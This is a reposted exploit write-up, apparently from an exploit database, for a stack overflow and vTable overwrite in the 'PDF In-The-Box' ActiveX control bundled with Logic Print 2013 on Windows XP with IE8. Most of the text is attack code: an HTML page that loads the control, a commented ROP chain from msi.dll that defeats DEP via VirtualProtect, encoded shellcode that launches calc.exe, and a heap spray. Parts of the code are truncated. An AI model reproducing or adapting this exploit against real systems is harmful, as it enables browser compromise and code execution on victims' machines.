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Logic Print 2013 - Stack Overflow (vTable Overwrite)

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Logic Print 2013 - Stack Overflow (vTable Overwrite)

Exploit Title: Logic Print 2013 stack overflow (vTable overwrite)
Software Link: http://www.logic-print.com/
Tested on: Win XP SP3 French + Internet Explorer 8
Date: 29/05/2013
Author: h1ch4m (Hicham Oumounid)
Email: h1ch4m@live.fr
Twitter: @o_h1ch4m

Thanks to corelanc0d3r for: "DEPS" - Precise heap spray for FF/IE8/IE9/IE10

Well, the bug isn't in the app itself, but in a third party dll "PDF In-The-Box" from http://www.synactis.com
Logic Print 2013 uses an old version of the dll, new ones aren't affected,
the ROP is from an os dll: [msi.dll] (C:\WINDOWS\system32\msi.dll) 3.1.4001.5512

<OBJECT classid="clsid:C80CAF1F-C58E-11D5-A093-006097ED77E6" id="xploit"></OBJECT>
<body OnLoad="xploit();">
<div id="blah"></div>
<script language="javascript">
var rop = "";
var shellcode = "";
var junk1 = '';
var junk2 = '';

function theMagicalMysteryTour()
rop = unescape("%u2230%u2030" +
"%u370d%u7d20" + // 0x7d20370d : # XCHG EAX,ESP # ADD DWORD PTR DS:[EAX],EAX # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04 ** [msi.dll] ** | ascii
"%u4141%u4141" +
"%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii
"%u4141%u4141" +

/// ECX = lpOldProtect (ptr to W address) ///
"%u1815%u7d21" + // 0x7d211815 : # POP ECX # RETN [msi.dll]
"%u4070%u7D3B" + // 0x7D3B4070 : # &Writable location [msi.dll]
/// EDX = NewProtect (0x40) ///
"%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll]
"%uFFC0%uFFFF" + // 0xFFFFFFBF
"%u66d7%u7d2e" + // 0x7d2e66d7 : # NEG EAX # RETN 0x04 ** [msi.dll]
"%u23dc%u7d20" + // 0x7d2023dc : # XCHG EAX,EDX # RETN ** [msi.dll]
"%u4141%u4141" +
/// EBX = dwSize ///
"%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll]
"%u66d7%u7d2e" + // 0x7d2e66d7 : # NEG EAX # RETN 0x04 ** [msi.dll]
"%u29ac%u7d24" + // 0x7d2429ac : # XCHG EAX,EBX # OR EAX,14C48300 # POP EBP # RETN 0x08 ** [msi.dll]
"%u4141%u4141" +
"%u4141%u4141" +
"%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii
"%u4141%u4141" +
"%u4141%u4141" +
/// ESI = ptr to VirtualProtect() ///
/// EBP = ReturnTo (ptr to jmp esp) ///
"%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll]
"%u1318%u6358" + // 0x63581318 : # ptr to VirtualProtect() [mshtml.dll]
"%uf84a%u7d3a" + // 0x7d3af84a : # MOV EAX,DWORD PTR DS:[EAX] # RETN ** [msi.dll]
"%u0622%u7d36" + // 0x7d360622 : # PUSH EAX # POP ESI # POP EBP # RETN 0x04 ** [msi.dll]
"%ub275%u7d24" + // 0x7d24b275 : # jmp esp
/// EDI = ROP NOP (RETN) ///
"%u2669%u7d20" + // 0x7d202669 : # POP EDI # RETN ** [msi.dll]
"%u4141%u4141" +
"%u0116%u7d2e" + // 0x7d2e0116 : # RETN ** [msi.dll] ** | ascii
/// EAX = NOP (0x90909090) ///
"%u9c86%u7d27" + // 0x7d279c86 : # POP EAX # RETN ** [msi.dll]
"%u9090%u9090" +
/// PUSH IT & GET IT ///
"%uc08e%u7d27" + // 0x7d27c08e : # PUSHAD # RETN ** [msi.dll]

// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +

function DEPS()
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x104;
junk = unescape("%u2020%u2020");
while (junk.length < 0x1000) junk += junk;

data = junk.substring(0,offset) + rop + shellcode
data += junk.substring(0,0x800-offset-rop.length-shellcode.length);

while (data.length < 0x80000) data += data;

for (var i = 0; i < 0x450; i++)
var obj = document.createElement("button");
obj.title = data.substring(0,0x40000-0x58);

function xploit()

// MOV EAX,DWORD PTR SS:[EBP-10]; the stack is overflowed, ebp-10 is put in eax then >>>>||

EAX = "\x28\x22\x30\x20"; // 0x20302228 heap adress " Corelan "DEPS" - Precise heap spray "

while (junk1.length < 189) junk1 += "\x41";
while (junk2.length < 7000) junk2 += "\x41";

var xploit = document.getElementById("xploit");


Sursa: Logic Print 2013 - Stack Overflow (vTable Overwrite)

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